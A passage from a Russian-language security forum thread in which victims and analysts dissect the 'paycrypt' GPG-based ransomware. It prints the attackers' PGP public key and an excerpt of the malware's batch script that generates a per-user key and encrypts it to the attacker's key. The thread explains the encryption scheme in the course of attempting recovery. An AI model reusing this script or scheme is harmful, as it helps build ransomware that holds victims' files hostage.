Например что-то вроде вот такой ссылки - http://windows.microsoft.com/ru-ru/windows-8/how-use-file-history
Зашифрованы файлы, *.paycrypt@gmail_com и др.
#501
Отправлено 29 Август 2014 - 17:47
#502
Отправлено 29 Август 2014 - 21:13
... "Потеряны" только 3-4 рабочих файла, которые нужны для ежедневной работы, но и их можно восстановить, ибо порывшись в почте я обнаружил их там за небольшой давностью (1-3 недели); вопрос актуализации - один-два дня максимум, т.к. все бумажные копии документов имеются.
я бы на вашем месте сбросил их злоумышленникам и попросил для теста расшифровать.
Нет, они - в формате .xls , а этот формат они "на халяву" не расшифровывают (с объяснением - "по понятным причинам").
у меня как раз и был файл в xls )) видимо убедила моя манера общения)
#503
Отправлено 30 Август 2014 - 18:34
v.martyanov, насколько понимаю для KEYBTC UNIQUE.PRIVATE шифруется пользовательским ключом в отличии от KEY.PRIVATE, следовательно у вас должны быть расшифрованные файлы - можете выложить формат этого файла или один из тех, что вам присылали?
#504
Отправлено 30 Август 2014 - 18:52
можете выложить формат этого файла или один из тех, что вам присылали?
а что это даст? в KEY.UNIQUE содержится список зашифрованных документов (полные имена) пользователя
Сообщение было изменено santy: 30 Август 2014 - 18:53
#505
Отправлено 30 Август 2014 - 19:56
santy, подозреваю, что по этому файлу оценивают в том числе платежеспособность клиента. Его, насколько понимаю можно сформировать заново с нужным списком, но для этого нужно знать формат.
Сообщение было изменено Kap_Killer: 30 Август 2014 - 19:57
#506
Отправлено 30 Август 2014 - 20:11
нужно знать форматесли это Вас так интересует, формат там простейший и чтобы его узнать просто внимательно "прочитайте" cmd файл этой заразы (это простой текст).
But a thing of beauty, I know, will never fade away...
#507
Отправлено 31 Август 2014 - 05:56
santy, подозреваю, что по этому файлу оценивают в том числе платежеспособность клиента. Его, насколько понимаю можно сформировать заново с нужным списком, но для этого нужно знать формат.
сформировать то можно, но зашифровать обратно (нужным ключом) не получится, поскольку для зашифровки в KEY.UNIQUE нужна секретная часть ключа, которым выполнено шифрование документов пользователя.
Сообщение было изменено santy: 31 Август 2014 - 05:57
#508
Отправлено 31 Август 2014 - 10:44
usverg, какой cmd файл? У меня есть только один cmd-файл - это keybase.cmd, но там ничего толком нет, просто для каждого файла шифрование, move и rename и всё. Есть ещё удалённый антивирем keybtc.bat, но в нем иероглифы.
santy, почему-то считал, что секретный ключ нужен для расшифровки, а для зашифровки нужен публичный, разве не так?
#509
Отправлено 31 Август 2014 - 11:13
keybtc.bat, но в нем иероглифыа вы посмотрите его в кодировке utf-16
But a thing of beauty, I know, will never fade away...
#510
Отправлено 31 Август 2014 - 12:10
почему-то считал, что секретный ключ нужен для расшифровки, а для зашифровки нужен публичный, разве не так?Именно так
#511
Отправлено 31 Август 2014 - 12:13
santy, почему-то считал, что секретный ключ нужен для расшифровки, а для зашифровки нужен публичный, разве не так?
да, верно. все так публичный ключ может оказаться на компе в темповых папках.
>
bat смотреть в UTF-8
#512
Отправлено 31 Август 2014 - 15:53
У меня похоже, что Nod грохнул вирус после вызова keybase.cmd
Т.к. дальше идут строчки
if exist "%USERPROFILE%\Desktop\UNIQUE.PRIVATE" echo BITM>> "%USERPROFILE%\Desktop\UNIQUE.PRIVATE"
И т.д.
Но дописанного " BITM" в UNIQUE.PRIVATE у меня нет.
#513
Отправлено 31 Август 2014 - 16:24
тесты надо проводить в папке, которая добавлена в исключения антивируса. можно восстановить из карантина.
дошло наконец, что в батнике используются два публик-ключа.
это может быть два различных ключа, или ключ + подключ.
скажем такой:
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1 - GPGshell v3.78
mI0EU66eugEEAMUDWYQ1l5N4ItPb23UBA6Embly6Zenqiut9m1h3Ac6L8sKn+ZJ4
F67ytP5de2eNEkGAxgwO2BSmmFCZ+OKx3U0M8gim+YlYm6Ho9irtrqHqdqBF8UmG
dz8SsGDe1OPUJsOZ7bZ80K3YM+TnEGtxt3nU9hynw3enyBI8SaT3SySDABEBAAG0
Jkhja1RlYW0gKEhja1RlYW0pIDxwYXljcnlwdEBnbWFpbC5jb20+iLgEEwECACIF
AlOunroCGwMGCwkIBwMCBhUIAgkKCwQWAgMBAh4BAheAAAoJEDY5qe4+146FFo8D
/Ayg3NQDHX9O5BhIzhWwcbYHxwJRqvyi2ZENCqI9hM53BHJQFKR1YUhX9kAfKEbY
gPJWYOg1QYY3VpEuNCHTJENCwXwH6DYs99GwO7f/8Dc6F7aDdGo3GSWKEwPuHv0F
FM7lcfz3GkGiSJWdTwHh383FmLY+cHk6ALf+EcgKA3PmuI0EU66eugEEANu1dTdR
fjZ99jViRV3FXPF3wrMTh1ODqeMLu9sYDtAKn5VgqbOQcymkRq4MMrX8St1VjAQ4
Wsxbl47Wo4opsqogVUQV2ok2vm35u3OELQlR6Loihu+CksAxaloPGe5IyryJ+Cbn
ymRvoHlPVhExYD3FQCiomXmrYm173ipIKlkzABEBAAGInwQYAQIACQUCU66eugIb
DAAKCRA2OanuPteOheY5BACvmE5n9gNr66SjIK6z2i1FC5Ei5R15jeu42C560Q3M
76gS6nSwdxaVjCynMts1Y/xRFd360RIBLY5XA4INteXUSYvUjKarF9mpPqorJ1fh
XRK2jlwW+1ppH5rpWxP8WfTfHOHmOAjVM0EjlqjjOiqByJfXWoufBzt5uMQ/rnmi
gQ==
=f2Fp
-----END PGP PUBLIC KEY BLOCK-----
:public key packet:
version 4, algo 1, created 1403952826, expires 0
pkey[0]: [1024 bits]
pkey[1]: [17 bits]
keyid: 3639A9EE3ED78E85
:user ID packet: "HckTeam (HckTeam) <paycrypt@gmail.com>"
:signature packet: algo 1, keyid 3639A9EE3ED78E85
version 4, created 1403952826, md5len 0, sigclass 0x13
digest algo 2, begin of digest 16 8f
hashed subpkt 2 len 4 (sig created 2014-06-28)
hashed subpkt 27 len 1 (key flags: 03)
hashed subpkt 11 len 5 (pref-sym-algos: 9 8 7 3 2)
hashed subpkt 21 len 5 (pref-hash-algos: 8 2 9 10 11)
hashed subpkt 22 len 3 (pref-zip-algos: 2 3 1)
hashed subpkt 30 len 1 (features: 01)
hashed subpkt 23 len 1 (key server preferences: 80)
subpkt 16 len 8 (issuer key ID 3639A9EE3ED78E85)
data: [1020 bits]
:public sub key packet:
version 4, algo 1, created 1403952826, expires 0
pkey[0]: [1024 bits]
pkey[1]: [17 bits]
keyid: 7856602BF05CF9EE
:signature packet: algo 1, keyid 3639A9EE3ED78E85
version 4, created 1403952826, md5len 0, sigclass 0x18
digest algo 2, begin of digest e6 39
hashed subpkt 2 len 4 (sig created 2014-06-28)
hashed subpkt 27 len 1 (key flags: 0C)
subpkt 16 len 8 (issuer key ID 3639A9EE3ED78E85)
data: [1024 bits]
-----------------------
вот эта часть нередко используется для шифрования KEY.PRIVATE
:public sub key packet:
version 4, algo 1, created 1403952826, expires 0
pkey[0]: [1024 bits]
pkey[1]: [17 bits]
keyid: 7856602BF05CF9EE
Сообщение было изменено santy: 31 Август 2014 - 16:26
#514
Отправлено 31 Август 2014 - 16:28
santy, тесты надо проводить в песочнице. Про Nod я написал про 25 августа в момент заражения на подхватившей машине.
#515
Отправлено 31 Август 2014 - 16:38
Kap_Killer, теперь понятен ход мысли.
вопрос. батник, который закачивается на комп юзера уже создан под этого юзера? т.е. предварительно на стороне злоумышленников создается_генерируется батник с уникальным для юзера пуб ключом?
Сообщение было изменено santy: 31 Август 2014 - 16:41
#516
Отправлено 31 Август 2014 - 16:46
santy, насколько понимаю у вас, как и у меня один публичный ключ с двумя криптоключами.
т.е. предварительно на стороне злоумышленников создается батник с уникальным для юзера пуб ключом?
Неправильно, схема проще, пользовательский ключ генерится на стороне пользователя, после этого приватная часть созданного ключа шифруется с использованием импортированного публичного ключа создателя вируса и переименовывается в KEY.PRIVATE и после этого затирается sdelete, ну и дальше шифруются файлы с использованием публичного сгенерённого пользовательского ключа.
#517
Отправлено 31 Август 2014 - 17:04
Kap_Killer,
ключ то генерится, но генерится он из текста, который зашит в готовом батнике.
я выдернул эту часть из батника (вместо taskmgr.exe переписал gpg.exe) чтобы посмотреть, что же в итоге будет создано.
cd "%TEMP%"
if exist "%temp%\paycrpt.bin" goto autoreply
echo paycrypt> "%temp%\paycrpt.bin"
cd "%appdata%"
REM rename "%APPDATA%\gnupg" gnupg_old%random%
REM attrib -s -h -r "%appdata%\gnupg\*.*"
REM attrib -s -h -r "%appdata%\gnupg"
REM del /f /q "%appdata%\gnupg\*.*"
REM rmdir /s /q "%appdata%\gnupg"
REM rename "%temp%\day.btc" iconv.dll
cd "%temp%"
set line1=fjZ99jViRV3FXPF3wrMTh1ODqeMLu9sYDtAKn5VgqbOQcymkRq4MMrX8St1VjAQ4
echo Key-Type: RSA> genky.btc
echo Key-Length: 1024>> genky.btc
echo Name-Real: cryptpay>> genky.btc
echo Name-Comment: cryptpay>> genky.btc
echo Name-Email: paycrypt@gmail.com>> genky.btc
set line2=ymRvoHlPVhExYD3FQCiomXmrYm173ipIKlkzABEBAAGInwQYAQIACQUCU66eugIb
set line3=DAAKCRA2OanuPteOheY5BACvmE5n9gNr66SjIK6z2i1FC5Ei5R15jeu42C560Q3M
echo -----BEGIN PGP PUBLIC KEY BLOCK-----> paycrypt.btc
echo Version: GnuPG v1>> paycrypt.btc
echo.>> paycrypt.btc
set fork=jp
echo mI0EU66eugEEAMUDWYQ1l5N4ItPb23UBA6Embly6Zenqiut9m1h3Ac6L8sKn+ZJ4>> paycrypt.btc
echo F67ytP5de2eNEkGAxgwO2BSmmFCZ+OKx3U0M8gim+YlYm6Ho9irtrqHqdqBF8UmG>> paycrypt.btc
echo dz8SsGDe1OPUJsOZ7bZ80K3YM+TnEGtxt3nU9hynw3enyBI8SaT3SySDABEBAAG0>> paycrypt.btc
echo Jkhja1RlYW0gKEhja1RlYW0pIDxwYXljcnlwdEBnbWFpbC5jb20+iLgEEwECACIF>> paycrypt.btc
echo AlOunroCGwMGCwkIBwMCBhUIAgkKCwQWAgMBAh4BAheAAAoJEDY5qe4+146FFo8D>> paycrypt.btc
echo /Ayg3NQDHX9O5BhIzhWwcbYHxwJRqvyi2ZENCqI9hM53BHJQFKR1YUhX9kAfKEbY>> paycrypt.btc
echo gPJWYOg1QYY3VpEuNCHTJENCwXwH6DYs99GwO7f/8Dc6F7aDdGo3GSWKEwPuHv0F>> paycrypt.btc
echo FM7lcfz3GkGiSJWdTwHh383FmLY+cHk6ALf+EcgKA3PmuI0EU66eugEEANu1dTdR>> paycrypt.btc
echo %line1%>> paycrypt.btc
echo Wsxbl47Wo4opsqogVUQV2ok2vm35u3OELQlR6Loihu+CksAxaloPGe5IyryJ+Cbn>> paycrypt.btc
echo %line2%>> paycrypt.btc
echo %line3%>> paycrypt.btc
echo 76gS6nSwdxaVjCynMts1Y/xRFd360RIBLY5XA4INteXUSYvUjKarF9mpPqorJ1fh>> paycrypt.btc
echo XRK2jlwW+1ppH5rpWxP8WfTfHOHmOAjVM0EjlqjjOiqByJfXWoufBzt5uMQ/rnmi>> paycrypt.btc
echo gQ==>> paycrypt.btc
echo =f2Fp>> paycrypt.btc
echo -----END PGP PUBLIC KEY BLOCK----->> paycrypt.btc
pgp.exe --homedir "%temp%" --batch --gen-key "%temp%\genky.btc"
PGP.exe --import "%temp%\paycrypt.btc"
pgp.exe -r HckTeam --yes --trust-model always --no-verbose -q --encrypt-files "%temp%\secring.gpg"
в итоге получаю secring.gpg 0 байт.
Сообщение было изменено santy: 31 Август 2014 - 17:04
#518
Отправлено 31 Август 2014 - 18:50
santy, secring.gpg где смотрите? Нужно искать в "%temp%", т.к. ключ задан --homedir "%temp%"
#519
Отправлено 01 Сентябрь 2014 - 05:09
Kap_Killer, да, там и смотрю. я уже и батник перекинул в %temp%. и кстати, видел по другим примерам (1-2), когда скидывали содержимое темповских папок. везде secring.gpg был нулевого размера.
#520
Отправлено 01 Сентябрь 2014 - 07:38
видимо важно, чтобы в папке был random_seed
в этом случае нормально генерится secring.gpg, собственно пара pubring.gpg, secring.gpg всякий раз создается новая, при каждом запуске батника, а вот paycrypt.btc естественно, всякий раз один и тот де. paycrypt.btc содержит подключ (публичную часть в данном случае этого ключа F05CF9EE), которым и выполняется далее шифрование secring.gpg
Сообщение было изменено santy: 01 Сентябрь 2014 - 07:39


